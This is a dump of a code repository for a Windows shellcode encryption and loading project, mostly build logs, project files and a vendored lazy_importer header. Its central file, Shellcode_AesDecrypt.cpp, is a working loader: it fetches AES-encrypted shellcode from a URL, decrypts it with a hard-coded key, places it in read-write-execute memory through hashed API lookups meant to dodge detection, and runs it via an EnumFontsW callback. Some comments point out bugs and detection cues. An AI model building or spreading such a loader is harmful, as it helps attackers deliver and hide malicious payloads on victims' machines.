https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Shellcode加密库.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/Debug/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/Base64.obj
--------------------------------------------------------------------------------
/aes加密/Debug/aes.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes.obj
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\debug\vc143.idb
2 | e:\source code\c_code\shellcode加密\aes加密\debug\vc143.pdb
3 | e:\source code\c_code\shellcode加密\aes加密\debug\aes加密.tlog\cl.command.1.tlog
4 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\Debug\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.ilk
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | encrypt_shellcode.cpp
3 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(66,11): warning C4804: “<=”: 在操作中使用类型“bool”不安全
4 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(69,30): warning C4018: “>=”: 有符号/无符号不匹配
5 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(112,20): warning C4018: “<”: 有符号/无符号不匹配
6 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(131,20): warning C4018: “<”: 有符号/无符号不匹配
7 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(124,9): warning C4101: “processHandle”: 未引用的局部变量
8 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(125,9): warning C4101: “remoteThread”: 未引用的局部变量
9 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(126,8): warning C4101: “remoteBuffer”: 未引用的局部变量
10 | aes加密.vcxproj -> E:\Source Code\C_code\shellcode加密\Debug\aes加密.exe
11 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\Debug\aes加密.exe" "E:\vcpkg\installed\x86-windows\debug\bin" "Debug\aes加密.tlog\aes加密.write.1u.tlog" "Debug\vcpkg.applocal.log"
12 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.obj
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x86-windows:
2 | Debug|Win32|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/Debug/encrypt_shellcode.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/encrypt_shellcode.obj
--------------------------------------------------------------------------------
/aes加密/Debug/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/vc143.idb
--------------------------------------------------------------------------------
/aes加密/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/Release/AES.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/AES.obj
--------------------------------------------------------------------------------
/aes加密/Release/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/Base64.obj
--------------------------------------------------------------------------------
/aes加密/Release/Shellcode_AesEncrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/Shellcode_AesEncrypt.obj
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\aes加密\release\test.obj
3 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.obj
4 | e:\source code\c_code\shellcode加密\release\aes加密.exe
5 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.ipdb
6 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.iobj
7 | e:\source code\c_code\shellcode加密\release\aes加密.pdb
8 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\cl.command.1.tlog
9 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\cl.read.1.tlog
10 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\cl.write.1.tlog
11 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\link.command.1.tlog
12 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\link.read.1.tlog
13 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\link.write.1.tlog
14 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\Release\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | AES.cpp
3 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1058,45): warning C4018: “<”: 有符号/无符号不匹配
4 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1069,45): warning C4018: “<”: 有符号/无符号不匹配
5 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1080,45): warning C4018: “<”: 有符号/无符号不匹配
6 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1101,45): warning C4018: “<”: 有符号/无符号不匹配
7 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1112,45): warning C4018: “<”: 有符号/无符号不匹配
8 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1124,45): warning C4018: “<”: 有符号/无符号不匹配
9 | Base64.cpp
10 | E:\Source Code\C_code\shellcode加密\aes加密\Base64.cpp(69,57): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
11 | E:\Source Code\C_code\shellcode加密\aes加密\Base64.cpp(86,56): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
12 | Shellcode_AesDecrypt.cpp
13 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(15,1): warning C4326: “main”的返回类型应为“int”而非“void”
14 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(25,20): warning C4018: “<”: 有符号/无符号不匹配
15 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(33,13): warning C4477: “sscanf”: 格式字符串“%02x”需要类型“unsigned int *”的参数,但可变参数 1 拥有了类型“unsigned char *”
16 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(33,13): message : 请考虑在格式字符串中使用“%hhx”
17 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(40,20): warning C4018: “<”: 有符号/无符号不匹配
18 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(534,48): error C2664: “LPVOID (LPVOID,SIZE_T,DWORD,DWORD)”: 无法将参数 1 从“_Ty”转换为“LPVOID”
19 | with
20 | [
21 | _Ty=int
22 | ]
23 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(534,48): message : 从整型类型转换为指针类型需要 reinterpret_cast、C 样式转换或带圆括号的函数样式强制转换
24 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(55,98): message : 查看对正在编译的函数 模板 实例化“decltype(auto) li::detail::lazy_function<52974849,LPVOID (__stdcall *)(LPVOID,SIZE_T,DWORD,DWORD)>::operator ()(int &&,unsigned int &&,int &&,int &&) const”的引用
25 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(532): error C3169: “decltype(auto)”: 无法从“LPVOID”推断“auto”的类型
26 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(55,19): error C3779: “li::detail::lazy_function<52974849,LPVOID (__stdcall *)(LPVOID,SIZE_T,DWORD,DWORD)>::operator ()”: 要使用将会返回“decltype(auto)”的函数,必须首先定义此函数
27 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(531,54): message : 参见“li::detail::lazy_function<52974849,LPVOID (__stdcall *)(LPVOID,SIZE_T,DWORD,DWORD)>::operator ()”的声明
28 | lazy_importer.cpp
29 | Shellcode_AesEncrypt.cpp
30 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(51,12): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
31 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x86-windows:
2 | Release|Win32|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/aes加密.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/Release/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/Shellcode_AesDecrypt.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_DEPRECATE
2 | #include
3 | #include "lazy_importer.hpp"
4 | #define BUF_SIZE 4096
5 | #include
6 | #include "Shellcode加密库.h"
7 |
8 | using namespace std;
9 | char g_key[17] = "/TXlwa6H5,,$vV$0"; // AES key (16 characters + NUL), hard-coded: stored as a plain string in the built binary
10 | char g_iv[17] = "uiP1St&thydHGkC]"; // AES IV (16 characters + NUL), hard-coded, so the same key/IV pair is used on every run
11 |
12 | void main(int argc, char* argv[]) // Loader entry point: takes AES-encrypted hex text, decrypts it, copies the bytes into executable memory and runs them through an API callback
13 | {
14 | // Encrypted shellcode (embedded copy)
15 | string buf = "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";
16 |
17 | unsigned char bufs[4096] = { 0 };
18 | char url[MAX_PATH] = { "http://127.0.0.1:8000/shellcode.txt" };
19 | GetInterNetURLText(url, bufs); // helper is defined outside this listing; presumably downloads the body of url into bufs - no buffer size is passed, so confirm it cannot write past the 4096 bytes
20 | string buf((char*)bufs);
21 |
22 | // Decrypt the shellcode
23 | string strbuf = DecryptionAES(buf, g_key, (char*)g_iv); // key and IV are the hard-coded globals; the result is treated below as hex text
24 |
25 | // Convert the decrypted hex text into raw bytes in the shellcode array
26 | char* p = (char*)strbuf.c_str();
27 | unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char)); // one byte per two hex characters; the calloc result is not checked
28 | for (size_t i = 0; i < strbuf.length() / 2; i++) {
29 | sscanf(p, "%02x", &shellcode[i]); // NOTE(review): %02x stores an unsigned int through a pointer to unsigned char, so each call writes past shellcode[i]; %02hhx matches the destination type
30 | p += 2;
31 | }
32 |
33 | // Print the contents of the shellcode array
34 | int ShellcodeSize = strbuf.length() / 2;
35 | printf("Decrypted buffer:\n");
36 | for (int i = 0; i < ShellcodeSize; i++) {
37 | printf("\\x%02x", shellcode[i]);
38 | }
39 |
40 | // Load the shellcode into a freshly committed read/write/execute region
41 | char* orig_buffer;
42 | orig_buffer = (char*)LI_FN(VirtualAlloc)(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // VirtualAlloc is reached through LI_FN (hashed export lookup, see lazy_importer.hpp) instead of a direct call; the return value is not checked
43 |
44 | RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);
45 |
46 | // Alternative (disabled): run the decrypted shellcode through the EnumUILanguages callback
47 | //EnumUILanguages((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
48 |
49 | // Run the shellcode as the EnumFontsW callback: the callback pointer targets the private RWX allocation rather than code in a loaded module, which is the observable a detection can key on
50 | EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
51 | }
--------------------------------------------------------------------------------
/aes加密/Shellcode_AesEncrypt.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Shellcode_AesEncrypt.cpp
--------------------------------------------------------------------------------
/aes加密/aes加密.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 | true
27 | true
28 |
29 |
30 | false
31 | false
32 |
33 |
34 | false
35 | false
36 |
37 |
38 |
39 |
40 | {b4dc16ff-79c8-4c66-be29-8528b628b876}
41 |
42 |
43 |
44 | 16.0
45 | Win32Proj
46 | {734881f0-b88d-41e3-b9c2-a48a8e0772d4}
47 | aes加密
48 | 10.0
49 |
50 |
51 |
52 | Application
53 | true
54 | v143
55 | Unicode
56 |
57 |
58 | Application
59 | false
60 | v143
61 | true
62 | Unicode
63 |
64 |
65 | Application
66 | true
67 | v143
68 | Unicode
69 |
70 |
71 | Application
72 | false
73 | v143
74 | true
75 | Unicode
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 | $(LibraryPath)
98 |
99 |
100 | $(LibraryPath)
101 |
102 |
103 |
104 | Level3
105 | true
106 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
107 | true
108 | false
109 |
110 |
111 | Console
112 | true
113 |
114 |
115 |
116 |
117 | Level3
118 | true
119 | true
120 | true
121 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
122 | true
123 | false
124 |
125 |
126 | Console
127 | true
128 | true
129 | true
130 |
131 |
132 |
133 |
134 | Level3
135 | true
136 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
137 | true
138 | false
139 | E:\Source Code\C_code\shellcode加密\Shellcode加密库;%(AdditionalIncludeDirectories)
140 |
141 |
142 | Console
143 | true
144 |
145 |
146 |
147 |
148 | Level3
149 | true
150 | true
151 | true
152 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
153 | true
154 | false
155 | E:\Source Code\C_code\shellcode加密\Shellcode加密库;%(AdditionalIncludeDirectories)
156 |
157 |
158 | Console
159 | true
160 | true
161 | true
162 |
163 |
164 |
165 |
166 |
167 |
168 |
--------------------------------------------------------------------------------
/aes加密/aes加密.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 头文件
20 |
21 |
22 |
23 |
24 | 源文件
25 |
26 |
27 | 源文件
28 |
29 |
30 | 源文件
31 |
32 |
33 |
--------------------------------------------------------------------------------
/aes加密/aes加密.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/aes加密/lazy_importer.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018-2020 Justas Masiulis
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | // documentation is available at https://github.com/JustasMasiulis/lazy_importer
18 |
19 | #ifndef LAZY_IMPORTER_HPP
20 | #define LAZY_IMPORTER_HPP
21 |
22 | #define LI_FN(name) \
23 | ::li::detail::lazy_function<::li::detail::khash(#name), decltype(&name)>()
24 |
25 | #define LI_FN_DEF(name) ::li::detail::lazy_function<::li::detail::khash(#name), name>()
26 |
27 | #define LI_MODULE(name) ::li::detail::lazy_module<::li::detail::khash(name)>()
28 |
29 | // NOTE only std::forward is used from this header.
30 | // If there is a need to eliminate this dependency the function itself is very small.
31 |
32 | #include
33 | #include
34 | #include
35 |
36 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE
37 | #if defined(_MSC_VER)
38 | #define LAZY_IMPORTER_FORCEINLINE __forceinline
39 | #elif defined(__GNUC__) && __GNUC__ > 3
40 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__))
41 | #else
42 | #define LAZY_IMPORTER_FORCEINLINE inline
43 | #endif
44 | #else
45 | #define LAZY_IMPORTER_FORCEINLINE inline
46 | #endif
47 |
48 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE
49 | #define LAZY_IMPORTER_TOLOWER(c) (c >= 'A' && c <= 'Z' ? (c | (1 << 5)) : c)
50 | #else
51 | #define LAZY_IMPORTER_TOLOWER(c) (c)
52 | #endif
53 |
54 | namespace li { namespace detail {
55 |
56 | template
57 | struct pair {
58 | First first;
59 | Second second;
60 | };
61 |
62 | namespace win {
63 |
64 | struct LIST_ENTRY_T {
65 | const char* Flink;
66 | const char* Blink;
67 | };
68 |
69 | struct UNICODE_STRING_T {
70 | unsigned short Length;
71 | unsigned short MaximumLength;
72 | wchar_t* Buffer;
73 | };
74 |
75 | struct PEB_LDR_DATA_T {
76 | unsigned long Length;
77 | unsigned long Initialized;
78 | const char* SsHandle;
79 | LIST_ENTRY_T InLoadOrderModuleList;
80 | };
81 |
82 | struct PEB_T {
83 | unsigned char Reserved1[2];
84 | unsigned char BeingDebugged;
85 | unsigned char Reserved2[1];
86 | const char* Reserved3[2];
87 | PEB_LDR_DATA_T* Ldr;
88 | };
89 |
90 | struct LDR_DATA_TABLE_ENTRY_T {
91 | LIST_ENTRY_T InLoadOrderLinks;
92 | LIST_ENTRY_T InMemoryOrderLinks;
93 | LIST_ENTRY_T InInitializationOrderLinks;
94 | const char* DllBase;
95 | const char* EntryPoint;
96 | union {
97 | unsigned long SizeOfImage;
98 | const char* _dummy;
99 | };
100 | UNICODE_STRING_T FullDllName;
101 | UNICODE_STRING_T BaseDllName;
102 |
103 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T*
104 | load_order_next() const noexcept
105 | {
106 | return reinterpret_cast(
107 | InLoadOrderLinks.Flink);
108 | }
109 | };
110 |
111 | struct IMAGE_DOS_HEADER { // DOS .EXE header
112 | unsigned short e_magic; // Magic number
113 | unsigned short e_cblp; // Bytes on last page of file
114 | unsigned short e_cp; // Pages in file
115 | unsigned short e_crlc; // Relocations
116 | unsigned short e_cparhdr; // Size of header in paragraphs
117 | unsigned short e_minalloc; // Minimum extra paragraphs needed
118 | unsigned short e_maxalloc; // Maximum extra paragraphs needed
119 | unsigned short e_ss; // Initial (relative) SS value
120 | unsigned short e_sp; // Initial SP value
121 | unsigned short e_csum; // Checksum
122 | unsigned short e_ip; // Initial IP value
123 | unsigned short e_cs; // Initial (relative) CS value
124 | unsigned short e_lfarlc; // File address of relocation table
125 | unsigned short e_ovno; // Overlay number
126 | unsigned short e_res[4]; // Reserved words
127 | unsigned short e_oemid; // OEM identifier (for e_oeminfo)
128 | unsigned short e_oeminfo; // OEM information; e_oemid specific
129 | unsigned short e_res2[10]; // Reserved words
130 | long e_lfanew; // File address of new exe header
131 | };
132 |
133 | struct IMAGE_FILE_HEADER {
134 | unsigned short Machine;
135 | unsigned short NumberOfSections;
136 | unsigned long TimeDateStamp;
137 | unsigned long PointerToSymbolTable;
138 | unsigned long NumberOfSymbols;
139 | unsigned short SizeOfOptionalHeader;
140 | unsigned short Characteristics;
141 | };
142 |
143 | struct IMAGE_EXPORT_DIRECTORY {
144 | unsigned long Characteristics;
145 | unsigned long TimeDateStamp;
146 | unsigned short MajorVersion;
147 | unsigned short MinorVersion;
148 | unsigned long Name;
149 | unsigned long Base;
150 | unsigned long NumberOfFunctions;
151 | unsigned long NumberOfNames;
152 | unsigned long AddressOfFunctions; // RVA from base of image
153 | unsigned long AddressOfNames; // RVA from base of image
154 | unsigned long AddressOfNameOrdinals; // RVA from base of image
155 | };
156 |
157 | struct IMAGE_DATA_DIRECTORY {
158 | unsigned long VirtualAddress;
159 | unsigned long Size;
160 | };
161 |
162 | struct IMAGE_OPTIONAL_HEADER64 {
163 | unsigned short Magic;
164 | unsigned char MajorLinkerVersion;
165 | unsigned char MinorLinkerVersion;
166 | unsigned long SizeOfCode;
167 | unsigned long SizeOfInitializedData;
168 | unsigned long SizeOfUninitializedData;
169 | unsigned long AddressOfEntryPoint;
170 | unsigned long BaseOfCode;
171 | unsigned long long ImageBase;
172 | unsigned long SectionAlignment;
173 | unsigned long FileAlignment;
174 | unsigned short MajorOperatingSystemVersion;
175 | unsigned short MinorOperatingSystemVersion;
176 | unsigned short MajorImageVersion;
177 | unsigned short MinorImageVersion;
178 | unsigned short MajorSubsystemVersion;
179 | unsigned short MinorSubsystemVersion;
180 | unsigned long Win32VersionValue;
181 | unsigned long SizeOfImage;
182 | unsigned long SizeOfHeaders;
183 | unsigned long CheckSum;
184 | unsigned short Subsystem;
185 | unsigned short DllCharacteristics;
186 | unsigned long long SizeOfStackReserve;
187 | unsigned long long SizeOfStackCommit;
188 | unsigned long long SizeOfHeapReserve;
189 | unsigned long long SizeOfHeapCommit;
190 | unsigned long LoaderFlags;
191 | unsigned long NumberOfRvaAndSizes;
192 | IMAGE_DATA_DIRECTORY DataDirectory[16];
193 | };
194 |
195 | struct IMAGE_OPTIONAL_HEADER32 {
196 | unsigned short Magic;
197 | unsigned char MajorLinkerVersion;
198 | unsigned char MinorLinkerVersion;
199 | unsigned long SizeOfCode;
200 | unsigned long SizeOfInitializedData;
201 | unsigned long SizeOfUninitializedData;
202 | unsigned long AddressOfEntryPoint;
203 | unsigned long BaseOfCode;
204 | unsigned long BaseOfData;
205 | unsigned long ImageBase;
206 | unsigned long SectionAlignment;
207 | unsigned long FileAlignment;
